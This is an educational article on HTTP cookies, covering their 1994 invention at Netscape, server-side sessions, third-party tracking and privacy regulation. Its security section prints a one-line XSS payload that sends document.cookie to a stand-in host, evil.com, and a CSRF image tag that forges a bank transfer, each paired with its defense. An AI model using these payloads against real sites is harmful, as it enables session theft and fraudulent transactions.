
Cookies: Giving HTTP a Memory

Lou Montulli's small text files solved HTTP's statelessness problem — and accidentally created the infrastructure for login sessions, shopping carts, and the ad-tracking economy.

#TL;DR

HTTP is stateless — every request is independent, and the server forgets you the moment it responds. This was a brilliant design choice for scalability, and a terrible one for applications. You can’t have a shopping cart if the server doesn’t know who you are. In 1994, Lou Montulli, a 23-year-old engineer at Netscape, borrowed a concept from Unix called a “magic cookie” and applied it to the web: the server sends a small piece of data to the browser, and the browser sends it back with every subsequent request. That’s it. A tiny text file, round-tripping with every HTTP request, gave the stateless web a memory. Cookies enabled logins, shopping carts, preferences, and session management. They also enabled pervasive user tracking, sparking privacy battles that continue to this day. The mechanism is simple. Its consequences were not.

#The Statelessness Problem

HTTP was designed to forget. A web server handles a request, sends a response, and moves on. It doesn’t know if you’ve been here before, what you looked at, or whether you’re logged in. Every request arrives as if from a stranger.

For a library of static documents, this was fine. For a shopping site, it was a disaster:

Request 1: GET /products/widget     → "Here's the widget page"
Request 2: POST /cart/add?item=42   → "Added to... whose cart?"
Request 3: GET /cart                → "Which cart? Who are you?"

Without state, there’s no way to associate a series of requests with a single user. No login sessions. No shopping carts. No “remember me.” No multi-step forms. The web’s most important emerging use case — e-commerce — was architecturally impossible.

#Magic Cookies

In 1994, Lou Montulli was working on Netscape Navigator. The company needed a way for its online store (yes, Netscape sold software) to implement a shopping cart. Montulli needed to make HTTP remember things without changing the protocol.

The solution came from an old computing concept: the magic cookie, a small, opaque piece of data passed between programs. Unix systems had used magic cookies for years, and the name is often linked to the fortune cookie. The idea is simple: you get a token, you hand it back later, and the system recognizes you.

Montulli’s implementation was simple. He added two HTTP headers:

The server sets a cookie:

HTTP/1.0 200 OK
Set-Cookie: session_id=abc123; Path=/; Expires=Fri, 01 Jan 1999 00:00:00 GMT

<html>Welcome to our store...</html>

The browser sends it back with every subsequent request:

GET /cart HTTP/1.0
Host: store.example.com
Cookie: session_id=abc123

The browser stores the cookie locally. Every time it makes a request to the same domain, it attaches the cookie automatically. The server reads the cookie, looks up abc123 in its session store, and knows who you are.
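
As a rough sketch of that round trip, here is how the two headers could be produced and read with Python's standard http.cookies module. The helper names build_set_cookie and read_cookie are made up for illustration; real servers normally let a framework do this.

```python
from http.cookies import SimpleCookie
from typing import Optional


def build_set_cookie(name: str, value: str, path: str = "/") -> str:
    """Server side: render the value of a Set-Cookie response header."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["path"] = path
    return jar[name].OutputString()


def read_cookie(cookie_header: str, name: str) -> Optional[str]:
    """Server side: pull one cookie out of the Cookie header the browser sent."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get(name)
    return morsel.value if morsel is not None else None


# First response: the server hands out the cookie.
set_cookie_value = build_set_cookie("session_id", "abc123")

# Later request: the browser echoes back only the name=value pair,
# never the attributes (Path, Expires, ...).
session_id = read_cookie("session_id=abc123", "session_id")
```

Note that the attributes travel in one direction only: the server never learns from the Cookie header when a cookie expires or which path it was scoped to.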

Montulli implemented it in Netscape Navigator in 1994. He deliberately did it without fanfare — no announcement, no user interface, no way for users to see or control cookies. They were meant to be an invisible infrastructure detail.

That decision to make cookies invisible would haunt the web for decades.

A cookie is a key-value pair with optional attributes that control its behavior:

Set-Cookie: name=value; Domain=.example.com; Path=/; Expires=...; Secure; HttpOnly; SameSite=Lax

Attribute          Purpose
name=value         The actual data (max ~4KB)
Domain             Which domains receive the cookie
Path               Which URL paths receive the cookie
Expires / Max-Age  When the cookie dies (omit for session cookie)
Secure             Only send over HTTPS
HttpOnly           JavaScript can’t read it (XSS defense)
SameSite           Controls cross-site sending (CSRF defense)

Session cookies (no Expires or Max-Age) vanish when the browser closes. Persistent cookies survive across sessions; they’re how “remember me” works.
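
To make the session/persistent distinction concrete, the sketch below builds both kinds of cookie with Python's http.cookies module (the samesite key needs Python 3.8 or newer). The function name make_cookie and its defaults are assumptions chosen for illustration, not a recommended policy.

```python
from http.cookies import SimpleCookie
from typing import Optional


def make_cookie(name: str, value: str, *, max_age: Optional[int] = None,
                secure: bool = True, http_only: bool = True,
                same_site: str = "Lax") -> str:
    """Render a Set-Cookie header value with the attributes from the table."""
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["path"] = "/"
    if max_age is not None:
        # A lifetime in seconds makes the cookie persistent.
        morsel["max-age"] = max_age
    morsel["secure"] = secure        # flag attribute: emitted only when true
    morsel["httponly"] = http_only   # flag attribute: emitted only when true
    morsel["samesite"] = same_site
    return morsel.OutputString()


# No Max-Age or Expires: a session cookie, gone when the browser closes.
session_cookie = make_cookie("sid", "x7k9m2")

# One year in seconds: a persistent "remember me" style cookie.
persistent_cookie = make_cookie("theme", "dark", max_age=31536000, http_only=False)
```

The only difference between the two headers that matters for lifetime is the presence of Max-Age (or Expires); everything else is scoping and security.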

// Reading cookies from JavaScript (unless HttpOnly is set)
document.cookie;
// "session_id=abc123; theme=dark; lang=en"

// Setting a cookie from JavaScript
document.cookie = "theme=dark; path=/; max-age=31536000";

The document.cookie API is famously awkward: it looks like a single string property, but assigning to it adds or updates one cookie rather than replacing the whole string, and reading it returns only name=value pairs with no attributes. Many JavaScript cookie libraries exist because this API is painful to use directly.
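
The asymmetry between reading and writing is easier to see in a toy model. The Python class below is only an approximation of the property's behavior, written for illustration: DocumentCookieModel is a hypothetical name, and it ignores domains, paths, and expiry dates entirely.

```python
class DocumentCookieModel:
    """Toy stand-in for the browser's document.cookie property."""

    def __init__(self):
        self._jar = {}  # cookie name -> value

    @property
    def cookie(self) -> str:
        # Reading returns every cookie as one "; "-joined string, no attributes.
        return "; ".join(f"{name}={value}" for name, value in self._jar.items())

    @cookie.setter
    def cookie(self, assignment: str) -> None:
        # Writing takes ONE "name=value; attr=..." string and upserts that cookie.
        pair, *attrs = [part.strip() for part in assignment.split(";")]
        name, _, value = pair.partition("=")
        attr_map = {}
        for attr in attrs:
            key, _, val = attr.partition("=")
            attr_map[key.lower()] = val
        max_age = attr_map.get("max-age")
        if max_age is not None and max_age.lstrip("-").isdigit() and int(max_age) <= 0:
            self._jar.pop(name, None)  # a non-positive max-age deletes the cookie
        else:
            self._jar[name] = value


doc = DocumentCookieModel()
doc.cookie = "session_id=abc123"
doc.cookie = "theme=dark; path=/; max-age=31536000"  # adds, does not replace
```

After the two assignments, reading doc.cookie yields both cookies, which is exactly the behavior that surprises people who expect plain string assignment.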

#Sessions: The Real Pattern

Cookies themselves are too small and too exposed to hold meaningful application state. The pattern that emerged, and that most web frameworks still support today, is server-side sessions:

1. User logs in with username + password
2. Server validates credentials
3. Server creates a session object: { userId: 42, cart: [], loggedInAt: ... }
4. Server stores it with a random ID: sessions["x7k9m2"] = { ... }
5. Server sends: Set-Cookie: sid=x7k9m2; HttpOnly; Secure
6. Browser sends "sid=x7k9m2" with every request
7. Server looks up sessions["x7k9m2"] → knows who you are

The cookie carries only an opaque identifier — a random string meaningless to anyone who doesn’t have the server’s session store. The actual state lives on the server. This is the pattern behind every login system, shopping cart, and authenticated web application.

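# Simplified server-side session flow
# (roughly what middleware such as express-session or Flask-Session does)
import secrets
from http.cookies import SimpleCookie

sessions = {}  # in production: Redis, database, etc.

def authenticate(username, password):
    # Placeholder: a real app verifies a salted password hash in its user store
    # and returns a user object, or None on bad credentials.
    raise NotImplementedError

def parse_cookie(cookie_header, name):
    # Return the named cookie's value from a Cookie header, or None if absent.
    morsel = SimpleCookie(cookie_header or "").get(name)
    return morsel.value if morsel is not None else None

def login(username, password):
    user = authenticate(username, password)
    if user is None:
        return None  # bad credentials: no session is created
    session_id = secrets.token_urlsafe(32)  # unguessable random ID
    sessions[session_id] = {"user_id": user.id, "cart": []}
    # Response header: Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax
    return session_id

def get_current_user(cookie_header):
    session_id = parse_cookie(cookie_header, "sid")
    return sessions.get(session_id)  # None if the cookie is missing or unknown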
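
The flow above never actually expires anything. One way to add that, sketched here under assumptions, is to store a deadline next to each session and refresh it on use (a sliding idle timeout). SessionStore, its method names, and the 30-minute default are all illustrative choices, not what any particular framework does.

```python
import secrets
import time


class SessionStore:
    """In-memory session store with a sliding idle timeout."""

    def __init__(self, ttl_seconds: float = 30 * 60, clock=time.monotonic):
        self._ttl = ttl_seconds
        self._clock = clock          # injectable so tests can control time
        self._sessions = {}          # session_id -> (expires_at, data)

    def create(self, data: dict) -> str:
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = (self._clock() + self._ttl, data)
        return session_id

    def get(self, session_id):
        entry = self._sessions.get(session_id)
        if entry is None:
            return None              # unknown or already destroyed
        expires_at, data = entry
        if self._clock() >= expires_at:
            del self._sessions[session_id]
            return None              # expired: force a fresh login
        # Each successful lookup pushes the deadline forward.
        self._sessions[session_id] = (self._clock() + self._ttl, data)
        return data

    def destroy(self, session_id) -> None:
        """Logout: forget the session even if the browser keeps the cookie."""
        self._sessions.pop(session_id, None)
```

Expiry enforced on the server matters because the cookie's own Expires or Max-Age is only a request to the browser; a stolen session ID stays valid until the server forgets it.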

#Third-Party Cookies and the Tracking Machine

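Cookies were designed to be sent only to the domain that set them. A cookie from store.example.com goes back to store.example.com, not anywhere else. This is often likened to the same-origin policy, but cookie scoping is looser: it matches on domain and path and ignores the port, and a Domain attribute can widen a cookie to subdomains.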
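
The scoping check a browser performs before attaching a cookie can be sketched as two small predicates, loosely following the domain-match and path-match rules in RFC 6265. This is a simplification for illustration: it ignores IP-address hosts and the public suffix list, and the function names are my own.

```python
def domain_matches(request_host: str, cookie_domain: str, host_only: bool = False) -> bool:
    """True if a cookie scoped to cookie_domain may be sent to request_host."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    if host_only:
        # No Domain attribute was given: only the exact setting host matches.
        return host == domain
    # With a Domain attribute, subdomains match too, but only on a label boundary.
    return host == domain or host.endswith("." + domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """True if request_path falls under cookie_path on a '/' boundary."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False
```

The label-boundary check is the important detail: a naive suffix comparison would let badexample.com receive cookies meant for example.com.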

But web pages load resources from many domains — images, scripts, fonts, ads. When an ad from tracker.adnetwork.com is embedded on news.example.com, the request to load that ad can set and read cookies for tracker.adnetwork.com. These are third-party cookies — set by a domain other than the one in the URL bar.

You visit news.example.com
  → Page loads ad from tracker.adnetwork.com
  → tracker.adnetwork.com sets: Set-Cookie: uid=user_777

You visit shopping.example.com
  → Page loads ad from tracker.adnetwork.com
  → Browser sends: Cookie: uid=user_777
  → tracker now knows user_777 reads news AND shops

This behavior was never designed for tracking. It falls out of the browser attaching a domain’s cookies to any request for that domain, whichever page triggered it. It nonetheless became the foundation of the behavioral advertising industry. Ad networks could track users across every site that embedded their code, building profiles of browsing behavior without the user’s knowledge or consent.
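
The flow above can be simulated in a few lines. This is a toy model only: Tracker and Browser are hypothetical classes, the browser's jar is reduced to one value per domain, and the embedding site is passed in directly where a real tracker would typically learn it from the Referer header.

```python
from collections import defaultdict
from itertools import count


class Tracker:
    """Stand-in for the ad server at tracker.adnetwork.com."""

    def __init__(self):
        self._next_id = count(777)
        self.profiles = defaultdict(list)  # uid -> sites where its ad was loaded

    def serve_ad(self, cookie, embedding_site):
        # No cookie yet means a new visitor: mint an ID for them.
        uid = cookie or f"user_{next(self._next_id)}"
        self.profiles[uid].append(embedding_site)
        return uid  # goes back to the browser as Set-Cookie: uid=...


class Browser:
    def __init__(self):
        self.jar = {}  # cookie domain -> cookie value

    def visit(self, site, tracker, tracker_domain="tracker.adnetwork.com"):
        # Loading the page triggers a subresource request to the tracker.
        # The jar is keyed by the tracker's domain, not by the page in the URL bar.
        sent = self.jar.get(tracker_domain)
        self.jar[tracker_domain] = tracker.serve_ad(sent, site)


tracker = Tracker()
browser = Browser()
browser.visit("news.example.com", tracker)
browser.visit("shopping.example.com", tracker)
```

Neither news.example.com nor shopping.example.com ever sees the uid cookie; only the tracker does, which is why the profile accumulates in one place.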

The backlash was slow but ultimately massive. The EU’s cookie consent directive (2009), GDPR (2018), and the “cookie banner” plague all stem from this one mechanism. Firefox began blocking cookies from known third-party trackers by default in 2019, and Safari blocked all third-party cookies by default in 2020. Google announced a phase-out for Chrome in 2020, delayed it repeatedly, and in 2024 abandoned the plan to remove them outright.

#Security: Stolen Sessions and Forged Requests

Cookies carry authentication, which makes them a prime target for attack:

Session hijacking (XSS) — if an attacker can inject JavaScript into a page, they can steal the session cookie:

// XSS attack: steal the session cookie
new Image().src = "https://evil.com/steal?c=" + document.cookie;

The defense: HttpOnly cookies, which JavaScript can’t read. The cookie still gets sent with requests, but document.cookie won’t reveal it.
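
A small model makes the split visible: the same jar produces two different views depending on who is asking. The names StoredCookie, cookie_header, and document_cookie are illustrative, and the model leaves out everything except the HttpOnly flag.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class StoredCookie:
    name: str
    value: str
    http_only: bool = False


def cookie_header(jar) -> str:
    """What the browser attaches to an HTTP request: every cookie in scope."""
    return "; ".join(f"{c.name}={c.value}" for c in jar)


def document_cookie(jar) -> str:
    """What page scripts can read: HttpOnly cookies are filtered out."""
    return "; ".join(f"{c.name}={c.value}" for c in jar if not c.http_only)


jar = [
    StoredCookie("sid", "x7k9m2", http_only=True),
    StoredCookie("theme", "dark"),
]
```

With this jar, an injected script that exfiltrates the script-visible string gets the theme preference but not the session ID. HttpOnly does not stop injected code from making requests that carry the cookie, so it limits theft rather than fixing XSS.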

Cross-Site Request Forgery (CSRF) — because cookies are sent automatically, an attacker can trick your browser into making authenticated requests:

<!-- On evil.com: the browser sends your bank's cookies automatically -->
<img src="https://bank.example.com/transfer?to=attacker&amount=10000">

Your browser dutifully attaches your bank’s session cookie to the request. The bank sees a valid session and processes the transfer.

The defense evolved over time: first CSRF tokens (a random value in each form that the attacker can’t guess), and eventually the SameSite cookie attribute (2016), which tells the browser not to send cookies with cross-site requests unless explicitly allowed.
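
Both defenses are small enough to sketch. The first two functions show a per-session CSRF token with a constant-time comparison; the third is a heavily simplified version of the SameSite decision. All function names are assumptions for illustration, and real browsers apply more conditions than the three inputs modeled here.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Store a fresh random token in the server-side session and return it
    so it can be embedded in a hidden form field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf(session: dict, submitted) -> bool:
    """Accept a state-changing request only if the form echoed the token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(expected.encode(), submitted.encode())


def same_site_allows(mode: str, is_same_site: bool, is_top_level_get: bool) -> bool:
    """Rough model of whether the browser attaches a cookie to a request."""
    if is_same_site or mode == "None":
        return True
    # Lax still sends cookies when the user follows a plain link to the site.
    return mode == "Lax" and is_top_level_get
```

The forged image request from evil.com is cross-site and not a top-level navigation, so under Lax or Strict the bank's cookie is simply not attached. The token check covers browsers and requests where SameSite does not apply.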

#What Cookies Got Right

Cookies are a 32-year-old hack that bolted state onto a stateless protocol. They’ve been abused, regulated, and nearly killed. They’re still here:

  • Minimal protocol change: cookies required only two HTTP headers (Set-Cookie and Cookie). No changes to HTTP itself, no new request types, no new infrastructure. This minimalism is a large part of why they were adopted so quickly and so widely.
  • Server-side session pattern: the cookie-as-session-identifier model is one of web development’s most enduring patterns. Nearly every mainstream framework implements or supports it. The abstraction (“opaque token in the cookie, real state on the server”) cleanly separates identity from data.
  • The security lessons: cookies were the battleground where the web learned about XSS, CSRF, session fixation, and secure token handling. Secure dates back to Netscape’s original specification, while HttpOnly and SameSite were added later in response to attacks seen in the wild (cookie theft via XSS and CSRF, respectively). The cookie specification is a compressed history of web security.
  • The privacy reckoning: third-party cookie tracking forced the web to confront questions it had been avoiding. Who owns browsing data? What constitutes consent? How much tracking should infrastructure enable by default? The answers (GDPR, browser privacy defaults, the slow death of third-party cookies) are reshaping the web’s business model. Cookies didn’t create the surveillance economy, but they were the mechanism that made it possible.

Cookies were a clever hack by a 23-year-old who needed shopping carts to work. They’ve outlasted every proposed replacement — from Microsoft’s Passport to various “cookieless tracking” schemes — because the pattern is fundamentally sound: a small, opaque token, round-tripped automatically, linking a series of stateless requests to a single session. The web is still stateless. Cookies are the polite fiction that it isn’t.